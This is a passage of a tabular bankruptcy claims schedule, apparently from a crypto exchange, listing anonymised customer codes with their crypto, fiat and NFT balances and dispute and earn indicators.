| 07328339 | | CUSDT[3], DOGE[3], ETH[0], ETHW[0], GRT[5.01633225], MATIC[0], SOL[9.34270166], TRX[1], USD[0.00] | Yes | |
| 07328340 | | USD[10.00] | | |
| 07328341 | | DOGE[370.00286318], USD[0.00] | | |
| 07328342 | | USD[10.00] | | |
| 07328346 | | AVAX[3.48890221], BAT[2.75517094], BCH[.20226493], BF_POINT[100], BTC[.01728004], DOGE[2407.14977873], ETH[7.82753549], ETHW[7.82461499], GRT[155.00012411], LINK[35.23670775], LTC[15.25593662], MATIC[2417.11895098], SHIB[3136380.4841901], SOL[8.58811873], SUSHI[15.17826026], TRX[3832.77402764], UNI[24.22124466], USD[0.00] | Yes | |
| 07328347 | | DOGE[0], TRX[.7], USD[0.01] | | |
| 07328348 | | USD[10.00] | | |
| 07328349 | | CUSDT[4], DOGE[0], USD[0.00] | | |
| 07328350 | | DOGE[1], USD[0.01] | | |
| 07328351 | | BRZ[1], CUSDT[4], DOGE[1], TRX[5], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328353 | | USD[10.00] | | |
| 07328356 | | CUSDT[2], DOGE[517.36941115], ETH[.0054433], ETHW[.0054433], LINK[.77121964], USD[0.00] | | |
| 07328357 | | CUSDT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07328358 | | DOGE[467.83035737], USD[10.00] | | |
| 07328359 | | DOGE[0], ETH[0], ETHW[0], KSHIB[0], SHIB[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07328361 | | USD[10.00] | | |
| 07328362 | | CUSDT[1], DOGE[947.08242629], GRT[2.26183502], USD[0.00] | | |
| 07328363 | | CUSDT[4], DOGE[107.47235945], TRX[1], USD[0.00] | | |
| 07328364 | | BTC[0.00001428], USD[0.00] | | |
| 07328365 | | BRZ[2], CUSDT[13], DOGE[2], SOL[4.47188896], TRX[2], USD[0.00] | Yes | |
| 07328366 | | DOGE[1736.23498383], USD[0.00] | | |
| 07328367 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07328369 | | DOGE[144.83786308], LINK[.07974085], USD[0.00] | | |
| 07328370 | | USD[10.00] | | |
| 07328371 | | USD[10.00] | | |
| 07328372 | | BTC[0], CUSDT[1], DOGE[0.00000035], GBP[0.00], SOL[0.00143073], TRX[2], USD[0.00] | | |
| 07328373 | | CUSDT[1], USD[0.01] | | |
| 07328374 | | BRZ[3], CUSDT[11], DOGE[21.55700605], SOL[0], TRX[5], USD[0.00] | Yes | |
| 07328375 | | USD[10.00] | | |
| 07328377 | | USD[0.01] | | |
| 07328378 | | USD[10.00] | | |
| 07328379 | | USD[10.00] | | |
| 07328380 | | USD[10.00] | | |
| 07328381 | | USD[10.00] | | |
| 07328382 | | USD[10.00] | | |
| 07328383 | | DOGE[0], USD[0.00] | | |
| 07328384 | | BAT[9.94700367], BTC[0.00033289], CUSDT[262.63278446], DOGE[34.34702374], GRT[7.88311181], KSHIB[89.26081689], MATIC[32.64278573], SHIB[95679.688927], SOL[0], TRX[2], USD[0.01] | Yes | |
| 07328385 | | USD[10.88] | Yes | |
| 07328386 | | USD[10.00] | | |
| 07328387 | | UNI[.55617885], USD[0.00] | Yes | |
| 07328388 | | USD[10.00] | | |
| 07328389 | | USD[0.00] | | |
| 07328390 | | USD[0.00] | | |
| 07328391 | | DOGE[0], SHIB[0], USD[0.01] | Yes | |
| 07328392 | | USD[10.00] | | |
| 07328393 | | BCH[0], BRZ[5], CUSDT[4], DOGE[5], TRX[5], USD[0.00] | | |
| 07328394 | | USD[10.00] | | |
| 07328395 | | USD[10.00] | | |
| 07328396 | | USD[10.00] | | |
| 07328397 | | TRX[1], USD[0.00] | | |
| 07328398 | | DOGE[1], USD[0.01] | | |
| 07328399 | | BRZ[3], BTC[0], CUSDT[12], DOGE[0], ETH[0], GRT[1.00498957], TRX[4], USD[0.01] | Yes | |
| 07328400 | | USD[10.00] | | |
| 07328401 | | CUSDT[1], USD[0.01] | | |
| 07328402 | | USD[10.09] | Yes | |
| 07328403 | Contingent, Disputed | USD[0.01], USDT[0] | | |
| 07328404 | | USD[10.00] | | |
| 07328405 | | CUSDT[4], DOGE[166.32952781], TRX[1], USD[0.00] | | |
| 07328406 | | USD[10.00] | | |
| 07328407 | | BAT[1], BRZ[2], CUSDT[12], DAI[0], ETH[0], SHIB[2], TRX[4], USD[217.23] | | |
| 07328408 | | BAT[1], CUSDT[5], DOGE[1], TRX[65.54509501], USD[0.00] | | |
| 07328409 | | BTC[0], SOL[0], USD[0.03], USDT[0] | | |
| 07328410 | | USD[10.00] | | |
| 07328413 | | USD[10.00] | | |
| 07328414 | | BCH[.01435895], BTC[.00043077], CUSDT[1], GRT[12.92162641], TRX[61.45035514], USD[0.75] | | |
| 07328416 | | BTC[0], DOGE[0], ETH[0], ETHW[0], SHIB[99800], TRX[.941], USD[0.00], USDT[0] | | |
| 07328417 | | USD[10.00] | | |
| 07328418 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328419 | | BCH[0], BTC[0], CUSDT[3], DOGE[0], TRX[2], USD[9.45] | | |
| 07328420 | | BTC[0], ETH[0], ETHW[0.00603259], SHIB[5], USD[102.41] | Yes | |
| 07328421 | | USD[10.00] | | |
| 07328422 | | USD[10.00] | | |
| 07328424 | | USD[10.00] | | |
| 07328425 | | USD[10.00] | | |
| 07328426 | | CUSDT[10], TRX[2], USD[0.00], USDT[0] | | |
| 07328427 | | DOGE[13.55184123], USD[0.00] | | |
| 07328428 | | CUSDT[2], DOGE[.00017683], USD[0.03] | | |
| 07328429 | | USD[10.00] | | |
| 07328430 | | BTC[0], CUSDT[1], DAI[0], DOGE[0.00014067], TRX[1], USD[0.01] | Yes | |
| 07328431 | | BRZ[2], GRT[1], TRX[4], USD[0.01], USDT[1.00000001] | | |
| 07328432 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.00] | | |
| 07328433 | | CUSDT[1], DOGE[0], TRX[1], USD[0.30] | | |
| 07328434 | | USD[10.00] | | |
| 07328435 | | TRX[194.70971548], USD[0.00] | | |
| 07328436 | | USD[10.00] | | |
| 07328437 | | BAT[2.09779235], BRZ[1], BTC[0], CUSDT[5], DOGE[0], ETH[0], GRT[4.20432337], LINK[0], TRX[8.00087675], UNI[0], USD[0.00], USDT[2.18999372] | Yes | |
| 07328438 | | BRZ[2], CUSDT[8], GRT[55.42330892], SOL[21.10755527], TRX[5], USD[0.00] | Yes | |
| 07328439 | | USD[10.00] | | |
| 07328440 | | TRX[1], USD[0.01] | | |
| 07328441 | | BRZ[6], CUSDT[7], DOGE[1.00628748], SOL[.02709437], TRX[5], USD[1.21] | | |
| 07328442 | | BRZ[1], CUSDT[5], DOGE[5.00044746], ETH[.00000001], ETHW[0], GRT[13.33335137], LINK[1.10342836], TRX[5], USD[242.96], USDT[0] | Yes | |
| 07328443 | | BTC[.00003981], CUSDT[1], DOGE[825.20765038], ETH[.00054431], ETHW[.00054431], SHIB[225462.95038335], TRX[1], USD[5.43] | Yes | |
| 07328445 | | USD[10.00] | | |
| 07328446 | | USD[10.00] | | |
| 07328447 | | USD[10.00] | | |
| 07328448 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07328449 | | USD[10.00] | | |
| 07328450 | | CUSDT[3], USD[0.01] | | |
| 07328451 | | USD[10.07] | | |
| 07328452 | | USD[10.00] | | |
| 07328454 | | BF_POINT[300], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07328455 | | USD[10.00] | | |
| 07328456 | | BTC[0], CUSDT[1], DOGE[50.88203295], ETH[0], USD[0.00] | Yes | |
| 07328457 | | BAT[1.0165555], BRZ[3], CUSDT[10], DOGE[3], GRT[1.00367791], KSHIB[801.68707013], SHIB[2603232.69105976], SOL[20.82398015], TRX[1], USD[0.01], USDT[1.09961317] | Yes | |
| 07328459 | | USD[10.00] | | |
| 07328460 | | USD[10.00] | | |
| 07328462 | | USD[10.00] | | |
| 07328463 | | CUSDT[1], USD[39.38] | | |
| 07328466 | | CUSDT[1], DOGE[157.16867377], USD[9.57] | | |
| 07328467 | | BTC[.00017827], CUSDT[1043.97567913], DOGE[233.65711116], ETH[.00376271], ETHW[.00372167], USD[0.00] | Yes | |
| 07328469 | | USD[10.00] | | |
| 07328470 | | USD[10.00] | | |
| 07328471 | | BTC[.03717152], CUSDT[1], DOGE[11277.05779627], ETH[.74372529], ETHW[.74341296], TRX[2], USD[10.81] | Yes | |
| 07328472 | | USD[10.00] | | |
| 07328473 | | BAT[1.0165555], BRZ[1], BTC[.00283588], CUSDT[30], DOGE[21.62105709], ETH[.00185902], ETHW[.00183166], GRT[1.00367791], SHIB[1], TRX[12.25785345], USD[222.96], USDT[2.18980689] | Yes | |
| 07328474 | | ALGO[15.50684301], BRZ[11.9746004], CUSDT[220.9148964], DOGE[1], ETHW[.0839165], SHIB[21], SUSHI[1.37788527], TRX[1], USD[0.01], USDT[1.02491717] | | |
| 07328475 | | USD[10.00] | | |
| 07328476 | | USD[10.00] | | |
| 07328477 | | USD[10.00] | | |
| 07328478 | | USD[0.00] | | |
| 07328479 | | DOGE[1], USD[0.00] | | |
| 07328480 | | CUSDT[1], GRT[3.88128638], USD[0.00] | | |
| 07328481 | | USD[10.00] | | |
| 07328482 | | BRZ[1], CUSDT[11], TRX[4], USD[0.00], USDT[0] | | |
| 07328483 | | DOGE[171.84035], USD[0.00] | | |
| 07328484 | | DOGE[139.91516663], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328485 | | CUSDT[2], DOGE[482.34075207], USD[150.18] | Yes | |
| 07328486 | | BTC[0.00244726], DOGE[464.04583052], USD[0.00] | Yes | |
| 07328489 | | BTC[.00000035], USD[0.00] | Yes | |
| 07328490 | | BTC[.00020387], CUSDT[2], SHIB[192006.36037426], USD[0.10] | Yes | |
| 07328491 | | USD[10.00] | | |
| 07328492 | | DOGE[2126.7170092], TRX[167.99032514], USD[0.05] | | |
| 07328493 | | AVAX[3.36245318], BTC[.0000018], ETH[.00002624], ETHW[.00002624], SHIB[1], SOL[.00040343], USD[0.02] | Yes | |
| 07328495 | | BF_POINT[200], BRZ[0], DOGE[0], ETH[0], TRX[1], USD[0.01] | | |
| 07328496 | | DOGE[1], ETH[0], GRT[0], SOL[0], TRX[1], USD[0.00] | | |
| 07328499 | | DOGE[29.4136887], ETH[0], ETHW[0], USD[0.00] | | |
| 07328500 | | USD[110.00] | | |
| 07328501 | | BTC[.0001704], USD[0.00] | | |
| 07328502 | | USD[10.00] | | |
| 07328504 | | DOGE[.00007689], TRX[1], USD[0.00] | | |
| 07328505 | | USD[10.00] | | |
| 07328506 | | USD[10.00] | | |
| 07328507 | | USD[10.00] | | |
| 07328508 | | USD[10.00] | | |
| 07328509 | | USD[10.00] | | |
| 07328510 | | GRT[4.22744167], USD[0.00] | | |
| 07328511 | | USD[10.00] | | |
| 07328513 | | CUSDT[1], DOGE[9.33112656], TRX[1], USD[0.01] | | |
| 07328514 | | USD[10.00] | | |
| 07328515 | | BAT[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], NFT [297408091011415195/Aural Light Collection on Solana #5][1], NFT [297843065169508351/Coachella x FTX Weekend 2 #1029][1], NFT [303261478562383000/Let it ⊛ #1][1], NFT [308090460409997447/Monochrome Collection #1][1], NFT [381193564498975302/Bigbang ][1], NFT [424931093871950903/CloudNFT Series 1 #37][1], NFT [497305608631607330/oil #1][1], NFT [499869596437438811/Aural Light Collection on Solana #2][1], NFT [564922288500569301/Connection][1], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07328516 | | USD[10.00] | | |
| 07328517 | | USD[10.00] | | |
| 07328519 | | USD[10.00] | | |
| 07328520 | | USD[10.00] | | |
| 07328521 | | BRZ[1], DOGE[216.45509514], USD[0.53], USDT[0] | | |
| 07328522 | | DOGE[0], TRX[0], USD[0.00] | | |
| 07328523 | | DOGE[1307.50729488], TRX[1], USD[0.00] | | |
| 07328524 | | USD[10.00] | | |
| 07328525 | | USD[10.00] | | |
| 07328526 | | USD[10.00] | | |
| 07328527 | | BTC[.0002223], USD[0.00] | | |
| 07328528 | | USD[10.00] | | |
| 07328529 | | CUSDT[1], USD[0.00] | | |
| 07328531 | | BRZ[1], CUSDT[4], ETH[1.0907626], ETHW[1.0907626], LINK[1], SOL[3.36092748], TRX[3], USD[0.00], USDT[2] | | |
| 07328532 | | USD[10.00] | | |
| 07328533 | | DOGE[731.80817409], TRX[1], USD[0.00], USDT[0] | | |
| 07328534 | | USD[10.86] | Yes | |
| 07328535 | | DOGE[.83957887], USD[0.00] | | |
| 07328536 | | BRZ[1], BTC[.0000191], DOGE[.00096612], USD[0.00] | | |
| 07328537 | | USD[10.00] | | |
| 07328538 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.01] | | |
| 07328539 | | DOGE[0], TRX[2], USD[0.01] | | |
| 07328540 | | USD[10.00] | | |
| 07328541 | | DOGE[1], ETH[0], LINK[0], MATIC[0], NFT [495842714941966338/Careless Cat #401][1], SHIB[1], SUSHI[0], USD[0.01] | Yes | |
| 07328542 | | CUSDT[1], DOGE[199.59915063], USD[0.00] | Yes | |
| 07328544 | | CUSDT[3], DOGE[380.91949275], GRT[21.10863656], SHIB[2], TRX[2], USD[0.01] | | |
| 07328545 | | USD[10.00] | | |
| 07328546 | | CUSDT[1], DOGE[171.6119258], USD[66.00] | | |
| 07328547 | | CUSDT[1], USD[0.01] | | |
| 07328548 | | DOGE[.50082389], USD[2.86] | | |
| 07328549 | | USD[10.00] | | |
| 07328550 | | CUSDT[6], DOGE[458.53824758], TRX[346.06367248], USD[0.00] | Yes | |
| 07328551 | | DOGE[0], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328552 | | CUSDT[1], USD[0.00] | | |
| 07328553 | | USD[10.00] | | |
| 07328554 | | USD[10.00] | | |
| 07328555 | | DOGE[.00078142], TRX[56.95256805], USD[0.00] | | |
| 07328556 | | BTC[0], DOGE[0.21756270], ETH[0], USD[0.00] | | |
| 07328557 | | USD[10.00] | | |
| 07328558 | | CUSDT[1], USD[0.00] | | |
| 07328559 | | USD[10.00] | | |
| 07328560 | | USD[10.00] | | |
| 07328561 | | DOGE[.00098883], USD[0.00] | | |
| 07328562 | | USD[10.00] | | |
| 07328563 | | DOGE[1], USD[0.00] | | |
| 07328564 | | BTC[.00019351], CUSDT[4], DOGE[782.53368135], ETH[.0449485], ETHW[.0449485], TRX[1], USD[0.00] | | |
| 07328565 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], PAXG[0], SHIB[1], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07328566 | | DOGE[1], GRT[2.12412395], LINK[.19926206], USD[0.00] | Yes | |
| 07328567 | | USD[10.00] | | |
| 07328569 | | USD[10.00] | | |
| 07328570 | | USD[10.00] | | |
| 07328571 | | DOGE[1], TRX[1], USD[0.14] | | |
| 07328572 | | USD[10.00] | | |
| 07328573 | | USD[10.00] | | |
| 07328574 | | CUSDT[2], ETHW[.15570519], NFT (436675372466762646/Belugie #5648)[1], NFT (550080126066438668/Imola Ticket Stub #810)[1], SOL[.00000001], USD[0.00] | Yes | |
| 07328575 | | USD[10.00] | | |
| 07328576 | | DOGE[1.5233047], USD[3.47] | | |
| 07328577 | | CUSDT[2315.52300229], DOGE[1855.48139728], ETH[.12451314], ETHW[.12335852], SHIB[10184.22581958], SOL[.18777625], SUSHI[0], TRX[2682.61319745], USD[0.00] | Yes | |
| 07328579 | | AAVE[0], AUD[0.00], BAT[0], BCH[0], BRZ[0], BTC[0], CAD[0.00], CUSDT[0], DAI[0], DOGE[0], ETH[0], ETHW[0], EUR[0.00], GRT[0], LINK[0], LTC[0], MATIC[0], MKR[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07328580 | | USD[10.00] | | |
| 07328581 | | USD[10.00] | | |
| 07328582 | | USD[10.00] | | |
| 07328583 | | USD[0.00] | | |
| 07328584 | | BRZ[0], USD[0.01] | | |
| 07328585 | | CUSDT[1], DOGE[1.00018046], USD[0.00] | | |
| 07328586 | | CUSDT[2], SHIB[634201.69226551], USD[0.00] | Yes | |
| 07328588 | | USD[10.00] | | |
| 07328589 | | USD[10.00] | | |
| 07328590 | | BTC[.03409083], CUSDT[4], DOGE[3], ETH[0.13641720], ETHW[0.13535505], LINK[0], SHIB[6], SOL[2.08432501], TRX[2], USD[0.00] | Yes | |
| 07328591 | | USD[10.00] | | |
| 07328592 | | USD[10.00] | | |
| 07328593 | | USD[10.00] | | |
| 07328595 | | CUSDT[4], DOGE[1], GRT[1.00367791], TRX[3], USD[0.01] | Yes | |
| 07328598 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07328599 | | BTC[.01026103], CUSDT[2], DOGE[1781.14029034], SHIB[901047.63374726], UNI[.00002668], USD[0.00] | Yes | |
| 07328600 | | BTC[0], DOGE[0], ETH[.00043327], ETHW[.00043327], LTC[.00464], TRX[.828], UNI[.04565], USD[0.05], USDT[.00855118] | | |
| 07328602 | | USD[10.00] | | |
| 07328603 | | USD[10.00] | | |
| 07328604 | | BTC[.00074772], CUSDT[15], ETH[.03960891], ETHW[.03960891], LTC[.2254511], TRX[2], USD[0.00] | | |
| 07328605 | | USD[10.00] | | |
| 07328606 | | CUSDT[3], DOGE[10986.91531723], GRT[1], TRX[1], USD[0.01], USDT[0] | | |
| 07328607 | | BRZ[2], CUSDT[61.76564607], DOGE[9636.42976377], ETH[.19589595], ETHW[.19568294], MATIC[21.4388754], SHIB[8652472.0607428], SOL[.27166389], SUSHI[.00000469], TRX[5], USD[0.00] | Yes | |
| 07328608 | | CUSDT[1], DOGE[.5468846], SHIB[1], TRX[1], USD[0.55] | | |
| 07328609 | | CUSDT[1], USD[0.00] | | |
| 07328610 | | LTC[.00063828], USD[0.00] | Yes | |
| 07328611 | | CUSDT[2], USD[0.37] | | |
| 07328613 | | BF_POINT[200], BTC[0.01406730], CUSDT[8], DOGE[0], ETH[0], ETHW[0.00003504], MATIC[0], NFT (358102131030682931/Coachella x FTX Weekend 1 #4759)[1], NFT (485244158785834827/Barcelona Ticket Stub #567)[1], NFT (532237255899920223/Entrance Voucher #3666)[1], SHIB[429], SOL[0], SUSHI[0], USD[0.00], USDT[0.00003707] | Yes | |
| 07328614 | | USD[10.00] | | |
| 07328615 | | DAI[0.00989572], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], UNI[0], USD[10.00], YFI[0] | | |
| 07328616 | | BAT[1], BRZ[4], CUSDT[2], DOGE[15221.51774090], ETH[1.33770402], ETHW[1.33770402], TRX[7], USD[0.00], USDT[5] | | |
| 07328617 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328618 | | BRZ[1], CUSDT[6], TRX[1], USD[0.01] | Yes | |
| 07328619 | | USD[10.00] | | |
| 07328620 | | CUSDT[5], DOGE[.66528733], TRX[2], USD[0.05] | | |
| 07328621 | | BRZ[1], DOGE[317.12255676], USD[19.00] | | |
| 07328622 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07328623 | | CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07328625 | | BRZ[1], TRX[1], USD[0.60] | | |
| 07328627 | | USD[0.01], USDT[0] | Yes | |
| 07328628 | | BTC[0], ETHW[.43908784], SOL[.00000001], TRX[1], USD[0.00] | Yes | |
| 07328629 | | USD[10.00] | | |
| 07328630 | | USD[10.00] | | |
| 07328631 | | DOGE[4453.54240923], TRX[1], USD[0.00] | Yes | |
| 07328632 | | BTC[0], DOGE[1.51955187], USD[0.00] | | |
| 07328633 | | BRZ[2], CUSDT[4], DOGE[421.74264319], ETH[.11644492], ETHW[.11644492], TRX[1], USD[388.21] | | |
| 07328635 | | USD[10.00] | | |
| 07328636 | | BRZ[3], CUSDT[11], SHIB[1], TRX[4], USD[0.02] | | |
| 07328638 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], TRX[0], UNI[0], USD[10.00], USDT[0] | | |
| 07328639 | | CUSDT[2], DOGE[1], TRX[5649.04064698], USD[0.00] | Yes | |
| 07328640 | | BTC[.01136306] | | |
| 07328641 | | DOGE[0], ETH[.01580214], ETHW[.01580214], LINK[3.11046175], USD[0.02] | | |
| 07328643 | | AAVE[.06733598], BCH[.02641581], BTC[.00050427], CUSDT[1], DAI[5.45382537], DOGE[108.82510354], ETH[.01333143], ETHW[.01316727], LTC[.04063564], PAXG[.0059575], SOL[1.85214328], SUSHI[1.28441125], TRX[166.52046592], USD[0.00] | Yes | |
| 07328644 | | DOGE[1870.47371884], USD[10.00] | | |
| 07328645 | | BTC[.00000101], DOGE[0.57671590], USD[0.00], USDT[.2677525] | | |
| 07328647 | | USD[10.00] | | |
| 07328649 | Contingent, Disputed | USD[0.19] | | |
| 07328650 | | DOGE[1.00005782], USD[0.20] | | |
| 07328651 | | USD[10.00] | | |
| 07328652 | | USD[10.00] | | |
| 07328653 | | USD[10.00] | | |
| 07328655 | | USD[10.00] | | |
| 07328658 | | USD[10.00] | | |
| 07328659 | | DOGE[195.09505275], ETH[.00631685], ETHW[.00623477], USD[0.00], USDT[0] | Yes | |
| 07328660 | | USD[10.00] | | |
| 07328661 | | USD[10.00] | | |
| 07328662 | | DOGE[6939.10788006], GRT[1], TRX[2], USD[0.00] | | |
| 07328663 | | USD[10.00] | | |
| 07328664 | | CUSDT[1], DOGE[.00057719], USD[0.01] | | |
| 07328665 | | ETH[.00003506], ETHW[.00003506], USD[0.00] | Yes | |
| 07328666 | | USD[10.00] | | |
| 07328667 | | BTC[0.00000469], DOGE[.72415], ETH[0.00000001], ETHW[0], SUSHI[.486225], USD[0.24] | | |
| 07328668 | | DOGE[.00003097], TRX[1], USD[0.00] | | |
| 07328669 | | USD[0.01] | | |
| 07328670 | | BRZ[0], BTC[0], DOGE[478.77039625], USD[0.00], USDT[0] | | |
| 07328671 | | USD[10.00] | | |
| 07328672 | | CUSDT[1], USD[0.00] | Yes | |
| 07328673 | | DOGE[1], USD[0.01] | | |
| 07328674 | | USD[10.00] | | |
| 07328675 | | BTC[0], ETH[.16021291], ETHW[.16021291], USD[8.85], USDT[0.00003150] | | |
| 07328676 | | USD[10.00] | | |
| 07328677 | | USD[10.00] | | |
| 07328678 | | CUSDT[2], DOGE[1], TRX[4], USD[0.00] | | |
| 07328679 | | USD[0.00] | | |
| 07328681 | | CUSDT[4], TRX[2], USD[0.00], USDT[1] | | |
| 07328682 | | DOGE[671.78076667], USD[11.04] | Yes | |
| 07328683 | | USD[10.00] | | |
| 07328684 | | CUSDT[9], DOGE[1.68051526], TRX[3], USD[0.00], USDT[1] | | |
| 07328686 | | USD[10.00] | | |
| 07328687 | | BAT[0], BTC[0], CUSDT[8489.06999858], DOGE[0], ETH[0.02198062], ETHW[0.02170702], GRT[204.12074786], LINK[0], SHIB[3268726.40272499], SOL[3.52655718], TRX[0], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326688 | | USD[10.00] | | |
| 07326689 | | BTC[1.23840963], ETH[.05231585], ETHWH[.05180891], NFT (44072076278250531/Degen Guy #47)[1], USD[-165.00] | Yes | |
| 07326691 | | BAT[1], CUSDT[6], DOGE[11], USD[0.90] | | |
| 07326692 | | USD[10.00] | | |
| 07326693 | | BRZ[1], CUSDT[2], TRX[1], USD[0.31] | | |
| 07326694 | | USD[10.00] | | |
| 07326696 | | USD[10.00] | | |
| 07326697 | | CUSDT[3], DOGE[2216.87654025], USD[0.00] | | |
| 07326698 | | USD[10.00] | | |
| 07326699 | | USD[10.00] | | |
| 07328700 | | USD[0.01] | | |
| 07328701 | | USD[12.97] | Yes | |
| 07328702 | | DOGE[99.73772325], USD[10.92] | | |
| 07328703 | | CAD[0.01], CUSDT[1], DOGE[4], SOL[.00000001], SUSHI[.00000003], USD[0.01] | | |
| 07328704 | | CUSDT[1], DOGE[887.52289875], USD[0.00] | | |
| 07328707 | | USD[10.00] | | |
| 07328708 | | BCH[0.01310269], BTC[0], DOGE[1], USD[0.00] | | |
| 07328709 | | CUSDT[8], DOGE[0], USD[0.00] | | |
| 07328710 | | DOGE[1.94042909], TRX[1], USD[0.01] | | |
| 07328711 | | USD[10.00] | | |
| 07328712 | | CUSDT[3], NFT (32636493879574148/9/Crypto Avatar Art #7)[1], TRX[1270.6291448], USD[0.00] | Yes | |
| 07328713 | | CUSDT[704.0220093], DOGE[1], ETH[.00357119], ETHWH[.00357119], SGD[13.17], TRX[1], USD[10.34] | | |
| 07328714 | | USD[0.52] | | |
| 07328715 | | BTC[0.00008967], DOGE[.387], GRT[.956], UNI[.00575], USD[0.00] | | |
| 07328716 | | DOGE[13.7538815], USD[0.00] | Yes | |
| 07328717 | | USD[10.00] | | |
| 07328718 | | BRZ[1], CUSDT[99.24108569], DOGE[162.02870274], ETH[.00788968], ETHWH[.00779385], LINK[.57894675], LTC[.25655545], NFT (400428295787993360/Coachella x FTX Weekend 2 #1299)[1], NFT (498469047967015023/88rising Sky Challenge - Cloud #298)[1], SHIB[17], SOL[1.77664602], SUSHI[3.6076604], TRX[2], USD[0.02] | Yes | |
| 07328719 | | BTC[.00010159], CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07328720 | | CUSDT[1], ETH[.00548029], ETHWH[.00548029], USD[0.00] | | |
| 07328721 | | USD[10.00] | | |
| 07328724 | | DOGE[1], TRX[0], USD[0.00] | | |
| 07328725 | | BRZ[1], CUSDT[1], USD[3489.39] | | |
| 07328726 | | CUSDT[2], DOGE[1383.58941493], SUSHI[298.30639073], TRX[2], UNI[5.52170311], USD[72.83], USDT[2.20171817] | Yes | |
| 07328727 | | USD[10.00] | | |
| 07328728 | | USD[10.00] | | |
| 07328729 | | USD[10.00] | | |
| 07328730 | | CUSDT[4], DOGE[1.66312695], SOL[.00596813], TRX[3.00094889], USD[0.01] | | |
| 07328732 | | USD[10.00] | | |
| 07328733 | | BAT[1.0165555], BRZ[3], CUSDT[30], DOGE[4], SHIB[1], TRX[3], USD[0.01] | Yes | |
| 07328734 | | USD[0.01] | | |
| 07328735 | | CUSDT[4], GRT[.00002812], SHIB[181162.18062718], TRX[2], USD[0.26], USDT[.00858073] | Yes | |
| 07328736 | | USD[10.00] | | |
| 07328737 | | BAT[1], TRX[1], USD[0.00] | | |
| 07328738 | | USD[10.00] | | |
| 07328739 | | CUSDT[1], TRX[1], USD[0.00], USDT[0] | | |
| 07328740 | | BAT[0], BRZ[4], BTC[0], CUSDT[2], ETH[0], GRT[1.00404471], LINK[0], SOL[0], TRX[3], UNI[0], USD[0.00], USDT[3.29883941] | Yes | |
| 07328741 | | DOGE[38176.60848275], SHIB[139495181.44749775], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07328742 | | USD[10.00] | | |
| 07328743 | | CUSDT[2], DOGE[68.7037364], USD[0.01] | | |
| 07328744 | | DOGE[.28], USD[0.23] | | |
| 07328747 | | USD[10.00] | | |
| 07328748 | | BAT[1.99995133], BRZ[2], CUSDT[6], TRX[8], USD[0.01], USDT[1] | | |
| 07328749 | | USD[10.00] | | |
| 07328750 | | USD[10.00] | | |
| 07328752 | | USD[0.00] | | |
| 07328755 | | USD[10.00] | | |
| 07328757 | | BRZ[2], CUSDT[4], SOL[.00003156], SUSHI[3.33261862], TRX[2257.72741824], USD[0.01] | Yes | |
| 07328758 | | DOGE[97.78518623], USD[0.03] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328760 | | BRZ[1], BTC[0], CUSDT[4], DOGE[0], TRX[3], USD[36.10] | | |
| 07328761 | | USD[10.00] | | |
| 07328762 | | USD[10.00] | | |
| 07328763 | | SHIB[174678.25508220], USD[0.00] | | |
| 07328765 | | BAT[2.11877144], BRZ[.00007363], CUSDT[56.13263622], DOGE[2], GRT[2.07189176], LTC[.00000007], TRX[16.10722031], USD[0.00] | Yes | |
| 07328766 | | CUSDT[1], DOGE[11.42490166], ETH[.00092457], ETHW[.00092457], SOL[.04196944], USD[0.00] | | |
| 07328767 | | CUSDT[2.248], DOGE[.00000004], ETH[.196754], ETHW[.196754], SHIB[189818800], TRX[51325.343], USD[2.43], USDT[.5807122] | | |
| 07328768 | | DOGE[156.23027088], USD[0.00] | | |
| 07328769 | | USD[0.00] | Yes | |
| 07328770 | | USD[10.00] | | |
| 07328771 | | USD[10.00] | | |
| 07328772 | | BRZ[1], CUSDT[5], GRT[284.1803496], SOL[27.45525007], TRX[11722.56702908], USD[0.00], USDT[1] | | |
| 07328773 | | USD[10.00] | | |
